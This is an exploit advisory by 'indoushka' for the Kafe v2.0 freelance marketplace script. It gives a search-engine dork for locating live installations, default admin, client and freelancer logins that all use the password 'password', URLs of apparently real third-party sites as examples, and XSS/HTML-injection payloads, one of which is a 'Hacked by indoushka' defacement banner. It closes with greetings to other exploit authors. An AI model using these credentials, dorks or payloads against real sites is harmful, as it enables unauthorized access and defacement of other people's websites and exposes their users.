====================================================================================================================================
| # Title : The Kafe v2.0 Backdoor Account Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : http://www.null-soft.xyz/kafe-v2-0-ultimate-freelance-marketplace/ |
| # Dork : "The Kafe - Ultimate Freelance Marketplace" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] use login :
Admin
Email – admin@freelancekafe.com
Password – password
Client
Email – client@gmail.com
Password – password
Email – alex@gmail.com
Password – password
Freelancer
Email – chris@gmail.com
Password – password
Email – freelancer@gmail.com
Password – password
http://www.arman-design.net/
Xss /html inject :
[+] Dorking İn Google Or Other Search Enggine .
[+] Login as freelancer http://labrocante.biz/Freelancer/jobboard.php?a=discussions&id=770864481184
[+] use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee> or <script>alert(/indoushka/);</script>
Greetings to :========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================
